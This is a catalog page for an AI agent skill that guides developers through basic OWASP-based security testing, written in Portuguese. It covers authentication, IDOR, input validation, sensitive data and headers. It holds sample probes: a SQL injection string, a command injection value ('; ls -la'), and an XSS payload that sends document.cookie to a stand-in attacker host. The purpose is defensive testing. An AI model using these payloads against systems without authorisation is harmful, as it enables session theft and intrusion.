teste-de-seguranca
Provides actionable security testing procedures for developers to identify common web vulnerabilities.
Install
mkdir -p .claude/skills/teste-de-seguranca && curl -L -o skill.zip "https://agentskills.codes/api/skills/download/9840" && unzip -o skill.zip -d .claude/skills/teste-de-seguranca && rm skill.zipInstalls to .claude/skills/teste-de-seguranca
Activation
This is the description your AI agent reads to decide when to run this skill — the better it matches your request, the more reliably it fires.
Guia o desenvolvedor na identificação e teste de vulnerabilidades de segurança no sistema, com foco em práticas acessíveis baseadas no OWASP Top 10. Use esta skill SEMPRE que o objetivo for verificar se o sistema está protegido contra as ameaças de segurança mais comuns. Acione quando o usuário mencionar: "teste de segurança", "security testing", "pentest básico", "vulnerabilidades", "OWASP", "SQL injection", "XSS", "cross-site scripting", "testar autenticação e autorização", "quero saber se minha API está segura", "auditoria de segurança básica", "dados dos usuários estão protegidos", "IDOR", "CORS", "injeção". Esta skill cobre o nível básico acessível a qualquer desenvolvedor — pentest profundo requer especialista em segurança ofensiva. Agnóstica de linguagem e framework.Key capabilities
- →Authentication and authorization testing
- →Input validation for injection vulnerabilities
- →Sensitive data protection checks
- →Security header verification
How it works
The skill follows a systematic process based on the OWASP Top 10 to identify common security flaws through manual verification steps.
Inputs & outputs
When to use teste-de-seguranca
- →Performing basic security audits
- →Testing input validation
- →Verifying authentication and authorization
About this skill
Teste de Segurança
O que é
O teste de segurança verifica se o sistema está protegido contra acessos não autorizados, injeção de código malicioso e exposição de dados sensíveis. Esta skill cobre o nível básico — baseado no OWASP Top 10 — que qualquer desenvolvedor pode e deve aplicar. Para testes de penetração avançados (pentest completo), é recomendada a contratação de um especialista.
Quando usar
- Antes de lançar qualquer sistema que processa dados de usuários
- Quando quer verificar se autenticação e autorização estão corretas
- Quando quer testar se campos de input são vulneráveis a injeção
- Quando quer verificar se dados sensíveis estão sendo protegidos corretamente
- Como parte da revisão de segurança antes de deploys em produção
Quando NÃO usar
- Como substituto para um pentest profissional em sistemas de alta criticidade (financeiro, saúde)
- Em sistemas de produção sem autorização explícita dos responsáveis
- Sem entender as implicações legais de testes de segurança em sistemas de terceiros
Como funciona — Processo Passo a Passo
Passo 1: Definir escopo Quais partes do sistema serão avaliadas? (API, formulários web, autenticação, banco de dados). Qual nível de profundidade? Esta skill cobre: autenticação, autorização, validação de input e proteção de dados.
Passo 2: Autenticação e autorização
- Acessar recursos sem credenciais → deve retornar 401 (não 403, não 200)
- Credenciais inválidas → mensagem genérica (não revela se o usuário existe — "credenciais inválidas", nunca "senha errada para este e-mail")
- Acessar recurso de outro usuário → deve retornar 403 (IDOR — Insecure Direct Object Reference)
- Usuário comum acessar área de administração → deve retornar 403
Passo 3: Validação de input (injeção)
- SQL Injection: inserir
' OR '1'='1em campos de texto que fazem queries - XSS (Cross-Site Scripting): inserir
<script>alert('xss')</script>em campos que renderizam HTML - Command Injection: inserir
; ls -laem campos processados pelo servidor - Regra: NUNCA confiar em input do cliente — sempre validar e sanitizar no servidor
Passo 4: Proteção de dados sensíveis
- Dados trafegam via HTTPS? (não HTTP)
- Senhas armazenadas com hash robusto? (não texto plano, não MD5)
- Tokens e chaves de API aparecem em logs? Em respostas de API?
- Dados sensíveis (CPF, cartão) aparecem em URLs ou headers não criptografados?
Passo 5: Headers e configurações
- Headers de segurança presentes? (Content-Security-Policy, X-Frame-Options, X-Content-Type-Options)
- Versão do servidor ou framework exposta nos headers de resposta?
- CORS configurado corretamente? (não
Access-Control-Allow-Origin: *em APIs privadas)
Passo 6: Documentar vulnerabilidades Para cada vulnerabilidade: tipo, severidade (Crítica/Alta/Média/Baixa), como reproduzir, impacto e sugestão de correção.
Critérios de Qualidade
- Autenticação, autorização E validação de input são cobertas
- Referência ao OWASP Top 10 como guia
- Vulnerabilidades classificadas por severidade
- Evidência de cada vulnerabilidade documentada (steps de reprodução)
- Limites honestos: menciona quando o escopo vai além desta skill (pentest avançado)
Exemplo Conceitual
Teste de IDOR (Insecure Direct Object Reference) em uma API de pedidos:
Cenário: usuário A tem o pedido de ID 1001. Usuário B faz a requisição GET /pedidos/1001 usando seu próprio token.
| Comportamento | Correto? |
|---|---|
| Retorna os dados do pedido 1001 (do usuário A) | ❌ Vulnerabilidade crítica |
| Retorna 403 Forbidden | ✅ Correto |
| Retorna 404 Not Found | ✅ Aceitável (não revela que o recurso existe) |
Teste de XSS em campo de nome de usuário:
Input: <script>document.location='http://atacante.com/cookie='+document.cookie</script>
| Comportamento | Correto? |
|---|---|
| Script é executado na página | ❌ Vulnerabilidade crítica |
| Input é sanitizado e exibido como texto | ✅ Correto |
| Campo rejeita o input com mensagem de erro | ✅ Correto |
Checklist de Conclusão
- Testei acesso sem autenticação (deve retornar 401)?
- Testei acesso a recursos de outro usuário (deve retornar 403 — IDOR)?
- Testei SQL injection em campos de texto que fazem queries?
- Testei XSS em campos que renderizam HTML?
- Verifiquei que dados trafegam via HTTPS?
- Verifiquei que senhas não são armazenadas em texto plano?
- Documentei cada vulnerabilidade com severidade e steps de reprodução?
Skills Relacionadas
| Skill | Relação | Quando preferir aquela |
|---|---|---|
teste-de-API | Complementar — testa o contrato HTTP | Quando quer validar autenticação e contratos antes de ir para segurança |
teste-de-sistema | Escopo — sistema completo | Quando quer testar segurança no contexto do sistema completo, não apenas uma API |
When not to use it
- →Production systems without explicit authorization
- →High-criticality systems requiring professional pentesting
Limitations
- →Limited to basic security audits
- →Not a substitute for professional penetration testing
How it compares
It provides a developer-accessible checklist approach rather than relying on automated black-box scanning tools.
Compared to similar skills
teste-de-seguranca side by side with the closest alternatives in the catalog.
| Skill | Installs | Updated | Safety | Difficulty |
|---|---|---|---|---|
| teste-de-seguranca (this skill) | 0 | 3mo | No flags | Intermediate |
| security-requirement-extraction | 7 | 2mo | No flags | Intermediate |
| api-fuzzing-for-bug-bounty | 9 | 6mo | Review | Advanced |
| secure-workflow-guide | 3 | 2mo | No flags | Advanced |
Try saying
Example prompts that trigger this skill in your AI assistant.
You might also like
security-requirement-extraction
wshobson
Derive security requirements from threat models and business context. Use when translating threats into actionable requirements, creating security user stories, or building security test cases.
api-fuzzing-for-bug-bounty
davila7
This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.
secure-workflow-guide
trailofbits
Guides through Trail of Bits' 5-step secure development workflow. Runs Slither scans, checks special features (upgradeability/ERC conformance/token integration), generates visual security diagrams, helps document security properties for fuzzing/verification, and reviews manual security areas.
cross-site-scripting-and-html-injection-testing
davila7
This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". It provides comprehensive techniques for detecting, exploiting, and understanding XSS and HTML injection attack vectors in web applications.
defense-in-depth-validation
mrgoonie
Validate at every layer data passes through to make bugs impossible
semgrep-rule-creator
trailofbits
Creates custom Semgrep rules for detecting security vulnerabilities, bug patterns, and code patterns. Use when writing Semgrep rules or building custom static analysis detections.